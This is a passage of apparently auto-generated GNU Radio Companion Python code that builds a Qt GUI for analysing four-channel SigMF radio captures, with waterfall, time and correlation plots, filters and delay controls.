self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_1_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_1_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_1"+": "))
self._manual_fine_delay_1_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_1))
self._manual_fine_delay_1_tool_bar.addWidget(self._manual_fine_delay_1_line_edit)
self._manual_fine_delay_1_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_1(int(str(self._manual_fine_delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_1_tool_bar, 6, 1, 1, 1)
for r in range(6, 7):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._manual_fine_delay_0_tool_bar = Qt.QToolBar(self)
self._manual_fine_delay_0_tool_bar.addWidget(Qt.QLabel("manual_fine_delay_0"+": "))
self._manual_fine_delay_0_line_edit = Qt.QLineEdit(str(self.manual_fine_delay_0))
self._manual_fine_delay_0_tool_bar.addWidget(self._manual_fine_delay_0_line_edit)
self._manual_fine_delay_0_line_edit.returnPressed.connect(
lambda: self.set_manual_fine_delay_0(int(str(self._manual_fine_delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_4.addWidget(self._manual_fine_delay_0_tool_bar, 5, 1, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
def _function_probe_0_3_probe():
while True:
val = self.probe_offset_0_3.level()
try:
self.set_function_probe_0_3(val)
except AttributeError:
pass
time.sleep(1.0 / (100))
_function_probe_0_3_thread = threading.Thread(target=_function_probe_0_3_probe)
_function_probe_0_3_thread.daemon = True
_function_probe_0_3_thread.start()
def _function_probe_0_2_probe():
while True:
val = self.probe_offset_0_2.level()
try:
self.set_function_probe_0_2(val)
except AttributeError:
pass
time.sleep(1.0 / (100))
_function_probe_0_2_thread = threading.Thread(target=_function_probe_0_2_probe)
_function_probe_0_2_thread.daemon = True
_function_probe_0_2_thread.start()
def _function_probe_0_1_probe():
while True:
val = self.probe_offset_0_1.level()
try:
self.set_function_probe_0_1(val)
except AttributeError:
pass
time.sleep(1.0 / (100))
_function_probe_0_1_thread = threading.Thread(target=_function_probe_0_1_probe)
_function_probe_0_1_thread.daemon = True
_function_probe_0_1_thread.start()
self._delay_3_tool_bar = Qt.QToolBar(self)
self._delay_3_tool_bar.addWidget(Qt.QLabel("delay_3"+": "))
self._delay_3_line_edit = Qt.QLineEdit(str(self.delay_3))
self._delay_3_tool_bar.addWidget(self._delay_3_line_edit)
self._delay_3_line_edit.returnPressed.connect(
lambda: self.set_delay_3(int(str(self._delay_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_3_tool_bar, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_2_tool_bar = Qt.QToolBar(self)
self._delay_2_tool_bar.addWidget(Qt.QLabel("delay_2"+": "))
self._delay_2_line_edit = Qt.QLineEdit(str(self.delay_2))
self._delay_2_tool_bar.addWidget(self._delay_2_line_edit)
self._delay_2_line_edit.returnPressed.connect(
lambda: self.set_delay_2(int(str(self._delay_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_2_tool_bar, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_1_tool_bar = Qt.QToolBar(self)
self._delay_1_tool_bar.addWidget(Qt.QLabel("delay_1"+": "))
self._delay_1_line_edit = Qt.QLineEdit(str(self.delay_1))
self._delay_1_tool_bar.addWidget(self._delay_1_line_edit)
self._delay_1_line_edit.returnPressed.connect(
lambda: self.set_delay_1(int(str(self._delay_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_1_tool_bar, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._delay_0_tool_bar = Qt.QToolBar(self)
self._delay_0_tool_bar.addWidget(Qt.QLabel("delay_0"+": "))
self._delay_0_line_edit = Qt.QLineEdit(str(self.delay_0))
self._delay_0_tool_bar.addWidget(self._delay_0_line_edit)
self._delay_0_line_edit.returnPressed.connect(
lambda: self.set_delay_0(int(str(self._delay_0_line_edit.text().toAscii()))))
self.main_tab_grid_layout_1.addWidget(self._delay_0_tool_bar, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self._corr_alpha_0_3_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_3_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_3"+": "))
self._corr_alpha_0_3_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_3))
self._corr_alpha_0_3_tool_bar.addWidget(self._corr_alpha_0_3_line_edit)
self._corr_alpha_0_3_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_3(eng_notation.str_to_num(str(self._corr_alpha_0_3_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_3_tool_bar, 8, 2, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_2_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_2_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_2"+": "))
self._corr_alpha_0_2_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_2))
self._corr_alpha_0_2_tool_bar.addWidget(self._corr_alpha_0_2_line_edit)
self._corr_alpha_0_2_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_2(eng_notation.str_to_num(str(self._corr_alpha_0_2_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_2_tool_bar, 8, 1, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self._corr_alpha_0_1_tool_bar = Qt.QToolBar(self)
self._corr_alpha_0_1_tool_bar.addWidget(Qt.QLabel("corr_alpha_0_1"+": "))
self._corr_alpha_0_1_line_edit = Qt.QLineEdit(str(self.corr_alpha_0_1))
self._corr_alpha_0_1_tool_bar.addWidget(self._corr_alpha_0_1_line_edit)
self._corr_alpha_0_1_line_edit.returnPressed.connect(
lambda: self.set_corr_alpha_0_1(eng_notation.str_to_num(str(self._corr_alpha_0_1_line_edit.text().toAscii()))))
self.main_tab_grid_layout_2.addWidget(self._corr_alpha_0_1_tool_bar, 8, 0, 1, 1)
for r in range(8, 9):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.single_pole_iir_filter_xx_0_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_3, nfft)
self.single_pole_iir_filter_xx_0_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_2, nfft)
self.single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(corr_alpha_0_1, nfft)
self.sigmf_source_3 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN3_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_2 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN2_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_1 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN1_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self.sigmf_source_0 = gr_sigmf.source('/home/zleffke/captures/kerberos/20210330/2200/CHAN0_2021-03-30T22:00:02Z.sigmf-data', "cf32" + ("_le" if sys.byteorder == "little" else "_be"), True)
self._samp_offset_0_3_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_3_formatter = None
else:
self._samp_offset_0_3_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_3_tool_bar.addWidget(Qt.QLabel("samp_offset_0_3"+": "))
self._samp_offset_0_3_label = Qt.QLabel(str(self._samp_offset_0_3_formatter(self.samp_offset_0_3)))
self._samp_offset_0_3_tool_bar.addWidget(self._samp_offset_0_3_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_3_tool_bar, 7, 0, 1, 1)
for r in range(7, 8):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._samp_offset_0_2_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_2_formatter = None
else:
self._samp_offset_0_2_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_2_tool_bar.addWidget(Qt.QLabel("samp_offset_0_2"+": "))
self._samp_offset_0_2_label = Qt.QLabel(str(self._samp_offset_0_2_formatter(self.samp_offset_0_2)))
self._samp_offset_0_2_tool_bar.addWidget(self._samp_offset_0_2_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_2_tool_bar, 6, 0, 1, 1)
for r in range(6, 7):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self._samp_offset_0_1_tool_bar = Qt.QToolBar(self)
if None:
self._samp_offset_0_1_formatter = None
else:
self._samp_offset_0_1_formatter = lambda x: eng_notation.num_to_str(x)
self._samp_offset_0_1_tool_bar.addWidget(Qt.QLabel("samp_offset_0_1"+": "))
self._samp_offset_0_1_label = Qt.QLabel(str(self._samp_offset_0_1_formatter(self.samp_offset_0_1)))
self._samp_offset_0_1_tool_bar.addWidget(self._samp_offset_0_1_label)
self.main_tab_grid_layout_4.addWidget(self._samp_offset_0_1_tool_bar, 5, 0, 1, 1)
for r in range(5, 6):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_1 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_1.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_1.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_1.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_1.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_1_win, 2, 3, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_0_win, 2, 2, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_0_win, 2, 1, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_waterfall_sink_x_0 = qtgui.waterfall_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_waterfall_sink_x_0.set_update_time(0.010)
self.qtgui_waterfall_sink_x_0.enable_grid(False)
self.qtgui_waterfall_sink_x_0.enable_axis_labels(True)
if not True:
self.qtgui_waterfall_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_waterfall_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
colors = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_waterfall_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_waterfall_sink_x_0.set_line_label(i, labels[i])
self.qtgui_waterfall_sink_x_0.set_color_map(i, colors[i])
self.qtgui_waterfall_sink_x_0.set_line_alpha(i, alphas[i])
self.qtgui_waterfall_sink_x_0.set_intensity_range(-100, 10)
self._qtgui_waterfall_sink_x_0_win = sip.wrapinstance(self.qtgui_waterfall_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_waterfall_sink_x_0_win, 2, 0, 2, 1)
for r in range(2, 4):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
nfft,
0,
1.0,
"x-Axis",
"y-Axis",
"Correlation",
3 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-140, 10)
self.qtgui_vector_sink_f_0.enable_autoscale(True)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_vector_sink_f_0_win, 0, 0, 4, 3)
for r in range(0, 4):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_2 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"Phase Delta", #name
4 #number of inputs
)
self.qtgui_time_sink_x_2.set_update_time(0.10)
self.qtgui_time_sink_x_2.set_y_axis(-1, 1)
self.qtgui_time_sink_x_2.set_y_label('Phase', "deg")
self.qtgui_time_sink_x_2.enable_tags(-1, True)
self.qtgui_time_sink_x_2.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_phase, 0.00005, 3, "")
self.qtgui_time_sink_x_2.enable_autoscale(True)
self.qtgui_time_sink_x_2.enable_grid(False)
self.qtgui_time_sink_x_2.enable_axis_labels(True)
self.qtgui_time_sink_x_2.enable_control_panel(False)
self.qtgui_time_sink_x_2.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_2.disable_legend()
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_2.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_2.set_line_label(i, labels[i])
self.qtgui_time_sink_x_2.set_line_width(i, widths[i])
self.qtgui_time_sink_x_2.set_line_color(i, colors[i])
self.qtgui_time_sink_x_2.set_line_style(i, styles[i])
self.qtgui_time_sink_x_2.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_2.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_2_win = sip.wrapinstance(self.qtgui_time_sink_x_2.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_5.addWidget(self._qtgui_time_sink_x_2_win, 2, 0, 2, 4)
for r in range(2, 4):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self.qtgui_time_sink_x_1 = qtgui.time_sink_f(
128, #size
samp_rate / nfft, #samp_rate
"Correlation Magnitude", #name
3 #number of inputs
)
self.qtgui_time_sink_x_1.set_update_time(0.10)
self.qtgui_time_sink_x_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_1.enable_tags(-1, True)
self.qtgui_time_sink_x_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, "")
self.qtgui_time_sink_x_1.enable_autoscale(True)
self.qtgui_time_sink_x_1.enable_grid(True)
self.qtgui_time_sink_x_1.enable_axis_labels(True)
self.qtgui_time_sink_x_1.enable_control_panel(False)
self.qtgui_time_sink_x_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_1.disable_legend()
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(3):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_1_win = sip.wrapinstance(self.qtgui_time_sink_x_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_time_sink_x_1_win, 4, 0, 4, 3)
for r in range(4, 8):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1_1 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"Absolute Phase", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1_1.set_y_label('Phase', "deg")
self.qtgui_time_sink_x_0_1_1_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_phase, 0.00005, 4, "")
self.qtgui_time_sink_x_0_1_1_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1_1.enable_grid(False)
self.qtgui_time_sink_x_0_1_1_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, 0, 0, 0, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(5):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_1_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_1_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_5.addWidget(self._qtgui_time_sink_x_0_1_1_1_win, 0, 0, 2, 4)
for r in range(0, 2):
self.main_tab_grid_layout_5.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_5.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1_0 = qtgui.time_sink_c(
512, #size
samp_rate, #samp_rate
"", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh_comp, 0.0001, trig_channel, "")
self.qtgui_time_sink_x_0_1_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1_0.enable_grid(False)
self.qtgui_time_sink_x_0_1_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "blue", "red", "red", "green",
"green", "black", "black", "cyan", "cyan"]
styles = [1, 2, 1, 2, 1,
2, 1, 2, 1, 2]
markers = [0, -1, 0, -1, 0,
-1, 0, -1, 0, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(10):
if len(labels[i]) == 0:
if(i % 2 == 0):
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, "Re{{Data {0}}}".format(i/2))
else:
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, "Im{{Data {0}}}".format(i/2))
else:
self.qtgui_time_sink_x_0_1_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_4.addWidget(self._qtgui_time_sink_x_0_1_1_0_win, 2, 0, 2, 4)
for r in range(2, 4):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_1 = qtgui.time_sink_f(
512, #size
samp_rate, #samp_rate
"", #name
5 #number of inputs
)
self.qtgui_time_sink_x_0_1_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, 0.0001, trig_channel, "")
self.qtgui_time_sink_x_0_1_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_1.enable_grid(False)
self.qtgui_time_sink_x_0_1_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, 0, 0, 0, -1,
-1, -1, -1, -1, -1]
